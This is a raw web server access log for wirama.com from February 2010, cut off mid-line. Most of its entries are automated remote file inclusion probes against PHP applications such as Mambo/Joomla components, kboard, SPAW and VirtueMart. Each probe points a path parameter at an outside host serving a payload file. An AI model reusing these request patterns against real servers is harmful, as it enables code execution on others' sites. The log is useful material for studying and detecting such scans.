211.193.131.164 - - [01/Feb/2010:13:13:29 -0800] "GET /logs/access_090329.log%20%20//components/minibb/index.php?absolute_path=http://www.matthewchang.com/bbs/skin/zero_vote/son1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:13:18:35 -0800] "GET /logs/access_090329.log%20%20//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:13:18:35 -0800] "GET /logs//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:13:18:35 -0800] "GET /config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:13:25:59 -0800] "GET /logs/access_090329.log%20%20//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:13:25:59 -0800] "GET /config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:13:25:59 -0800] "GET /logs//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:13:35:27 -0800] "GET /logs/access_090331.log///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:13:37:33 -0800] "GET /logs/access_090331.log///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:13:38:38 -0800] "GET /logs/access_090330.log///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:13:39:31 -0800] "GET /config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:13:39:31 -0800] "GET /logs//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:13:39:31 -0800] "GET /logs/access_090329.log%20%20//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:13:40:51 -0800] "GET /logs/access_090801.log///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
125.141.91.138 - - [01/Feb/2010:13:41:09 -0800] "GET /logs/access_100101.log//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:13:41:09 -0800] "GET /logs//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:13:41:09 -0800] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
125.141.91.138 - - [01/Feb/2010:13:41:40 -0800] "GET /logs/access_091201.log//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://med.buu.ac.th///components/com_mylink/son1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
110.137.238.255 - - [01/Feb/2010:13:42:38 -0800] "GET /logs/ HTTP/1.1" 200 3941 "http://www.google.co.id/search?q=index+of+%2Flogs&btnG=Telusuri&hl=id&sa=2" "Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.wirama.com"
110.137.238.255 - - [01/Feb/2010:13:42:40 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.wirama.com"
110.137.238.255 - - [01/Feb/2010:13:42:43 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.wirama.com"
110.137.238.255 - - [01/Feb/2010:13:42:49 -0800] "GET /logs/access.log HTTP/1.1" 200 503889 "http://www.wirama.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; id; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.wirama.com"
128.114.59.145 - - [01/Feb/2010:13:42:49 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7" "www.wirama.com"
128.114.59.145 - - [01/Feb/2010:13:42:50 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7" "www.wirama.com"
128.114.59.145 - - [01/Feb/2010:13:42:53 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7" "www.wirama.com"
128.114.59.145 - - [01/Feb/2010:13:42:58 -0800] "GET / HTTP/1.1" 200 916 "http://www.wirama.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7" "www.wirama.com"
128.114.59.145 - - [01/Feb/2010:13:43:00 -0800] "GET /_private/ HTTP/1.1" 200 675 "http://www.wirama.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7" "www.wirama.com"
128.114.59.145 - - [01/Feb/2010:13:43:05 -0800] "GET /logs/ HTTP/1.1" 200 3941 "http://www.wirama.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7" "www.wirama.com"
128.114.59.145 - - [01/Feb/2010:13:43:13 -0800] "GET /tmp/ HTTP/1.1" 200 520 "http://www.wirama.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7" "www.wirama.com"
128.114.59.145 - - [01/Feb/2010:13:43:23 -0800] "GET / HTTP/1.1" 200 916 "http://www.google.com/search?client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&channel=s&hl=en&source=hp&q=Wirama&btnG=Google+Search" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:13:43:50 -0800] "GET /logs//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:13:43:50 -0800] "GET /logs/access_090329.log%20%20//config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
211.233.3.101 - - [01/Feb/2010:13:43:50 -0800] "GET /config/spaw_control.config.php?spaw_dir=http://www.musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:13:45:42 -0800] "GET /logs/access_090329.log///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:13:46:05 -0800] "GET /logs/access_090330.log///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:13:46:07 -0800] "GET /logs/access_090330.log///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:13:47:49 -0800] "GET /logs/access_090329.log///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:13:48:00 -0800] "GET /logs/access_090329.log///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:13:53:42 -0800] "GET /logs/access_090801.log///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:13:53:44 -0800] "GET /logs/access_090801.log///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
72.15.149.75 - - [01/Feb/2010:13:55:28 -0800] "GET /logs/access_091101.log/include/prodler.class.php?sPath=http://www.sun-angel.ru//js/gid.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
72.15.149.75 - - [01/Feb/2010:13:55:28 -0800] "GET /logs/include/prodler.class.php?sPath=http://www.sun-angel.ru//js/gid.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
72.15.149.75 - - [01/Feb/2010:13:55:28 -0800] "GET /include/prodler.class.php?sPath=http://www.sun-angel.ru//js/gid.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
72.15.149.75 - - [01/Feb/2010:13:55:28 -0800] "GET /logs/access.log/include/prodler.class.php?sPath=http://www.sun-angel.ru//js/gid.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.wirama.com"
72.15.149.75 - - [01/Feb/2010:13:56:10 -0800] "GET /include/prodler.class.php?sPath=http://www.sun-angel.ru//js/gid.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "wirama.com"
72.15.149.75 - - [01/Feb/2010:13:56:10 -0800] "GET /logs/include/prodler.class.php?sPath=http://www.sun-angel.ru//js/gid.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "wirama.com"
211.193.131.164 - - [01/Feb/2010:13:59:50 -0800] "GET /index.php?cropimagedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.131.164 - - [01/Feb/2010:13:59:51 -0800] "GET /logs//index.php?cropimagedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.131.164 - - [01/Feb/2010:13:59:55 -0800] "GET /logs/access_090601.log//index.php?cropimagedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
222.116.210.143 - - [01/Feb/2010:13:59:56 -0800] "GET /logs/access_090601.log HTTP/1.1" 200 274569 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.wirama.com"
87.250.255.243 - - [01/Feb/2010:14:00:08 -0800] "GET /logs/access_090701.log HTTP/1.1" 200 7422887 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.wirama.com"
94.23.52.22 - - [01/Feb/2010:14:00:39 -0800] "GET /logs/access_090601.log HTTP/1.1" 200 274569 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.wirama.com"
211.193.131.164 - - [01/Feb/2010:14:00:45 -0800] "GET /logs/access_091101.log//index.php?cropimagedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
123.214.172.197 - - [01/Feb/2010:14:01:44 -0800] "GET /logs/access_100101.log///administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
123.214.172.197 - - [01/Feb/2010:14:01:44 -0800] "GET /logs///administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
123.214.172.197 - - [01/Feb/2010:14:01:44 -0800] "GET //administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
123.214.172.197 - - [01/Feb/2010:14:01:48 -0800] "GET /logs/access_100101.log///administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
123.214.172.197 - - [01/Feb/2010:14:01:48 -0800] "GET //administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
123.214.172.197 - - [01/Feb/2010:14:01:48 -0800] "GET /logs///administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.131.164 - - [01/Feb/2010:14:01:49 -0800] "GET /index.php?cropimagedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
123.214.172.197 - - [01/Feb/2010:14:01:50 -0800] "GET /logs///administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
123.214.172.197 - - [01/Feb/2010:14:01:50 -0800] "GET /logs/access_100101.log///administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
123.214.172.197 - - [01/Feb/2010:14:01:50 -0800] "GET //administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.131.164 - - [01/Feb/2010:14:01:50 -0800] "GET /logs//index.php?cropimagedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.131.164 - - [01/Feb/2010:14:01:51 -0800] "GET /logs/access_090601.log//index.php?cropimagedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
123.214.172.197 - - [01/Feb/2010:14:02:15 -0800] "GET /logs/access_091201.log///administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
123.214.172.197 - - [01/Feb/2010:14:02:20 -0800] "GET /logs/access_091201.log///administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
123.214.172.197 - - [01/Feb/2010:14:02:21 -0800] "GET /logs/access_091201.log///administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
211.193.131.164 - - [01/Feb/2010:14:02:51 -0800] "GET /logs/access_091101.log//index.php?cropimagedir=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:14:03:59 -0800] "GET /logs/access_090330.log///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.124.149.168 - - [01/Feb/2010:14:08:44 -0800] "GET /logs/access_090331.log/components/com_simpleboard/file_upload.php?sbp=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
203.124.149.168 - - [01/Feb/2010:14:08:44 -0800] "GET /logs/components/com_simpleboard/file_upload.php?sbp=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
203.124.149.168 - - [01/Feb/2010:14:08:44 -0800] "GET /components/com_simpleboard/file_upload.php?sbp=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
79.170.45.126 - - [01/Feb/2010:14:08:51 -0800] "GET /logs/access_090801.log///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.124.149.168 - - [01/Feb/2010:14:09:01 -0800] "GET /logs/components/com_simpleboard/file_upload.php?sbp=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
203.124.149.168 - - [01/Feb/2010:14:09:01 -0800] "GET /logs/access_090331.log/components/com_simpleboard/file_upload.php?sbp=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
203.124.149.168 - - [01/Feb/2010:14:09:01 -0800] "GET /components/com_simpleboard/file_upload.php?sbp=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "wirama.com"
203.124.149.168 - - [01/Feb/2010:14:10:02 -0800] "GET /logs/access_090329.log%20%20/components/com_simpleboard/file_upload.php?sbp=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.124.149.168 - - [01/Feb/2010:14:10:02 -0800] "GET /components/com_simpleboard/file_upload.php?sbp=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.124.149.168 - - [01/Feb/2010:14:10:02 -0800] "GET /logs/components/com_simpleboard/file_upload.php?sbp=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.124.149.168 - - [01/Feb/2010:14:10:09 -0800] "GET /logs/components/com_simpleboard/file_upload.php?sbp=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.124.149.168 - - [01/Feb/2010:14:10:09 -0800] "GET /components/com_simpleboard/file_upload.php?sbp=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.124.149.168 - - [01/Feb/2010:14:10:12 -0800] "GET /logs/access_090329.log%20%20/components/com_simpleboard/file_upload.php?sbp=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
99.173.30.78 - - [01/Feb/2010:14:11:25 -0800] "GET / HTTP/1.1" 200 916 "-" "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10" "www.wirama.com"
203.124.149.168 - - [01/Feb/2010:14:13:45 -0800] "GET /logs/components/com_simpleboard/file_upload.php?sbp=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.124.149.168 - - [01/Feb/2010:14:13:45 -0800] "GET /logs/access_090329.log/components/com_simpleboard/file_upload.php?sbp=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.124.149.168 - - [01/Feb/2010:14:13:46 -0800] "GET /components/com_simpleboard/file_upload.php?sbp=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:14:15:07 -0800] "GET /logs/access_090330.log///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
79.170.45.126 - - [01/Feb/2010:14:16:50 -0800] "GET /logs/access_090329.log///kboard/kboard.php?board=notice&act=vote&no=20&page=&search_mode=&search_word=&cid=//kboard/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
203.124.149.168 - - [01/Feb/2010:14:17:14 -0800] "GET /logs/access_090330.log/components/com_simpleboard/file_upload.php?sbp=http://neokult.com/img/open.jpg??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:14:17:39 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:14:17:39 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:14:17:39 -0800] "GET /logs/access_090731.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:14:17:44 -0800] "GET /logs/access_090731.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:14:17:44 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:14:17:44 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:14:17:45 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:14:17:45 -0800] "GET /logs/access_090731.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:14:17:45 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:14:18:05 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:14:18:05 -0800] "GET /logs/access_090731.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:14:18:05 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:14:18:05 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:14:18:05 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:14:18:06 -0800] "GET /logs/access_090731.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:14:18:07 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:14:18:07 -0800] "GET /logs/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:14:18:07 -0800] "GET /logs/access_090731.log/components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:14:18:07 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.wirama.com"
174.37.162.130 - - [01/Feb/2010:14:18:07 -0800] "GET /logs/access_090731.log/components/com_virtuemart/s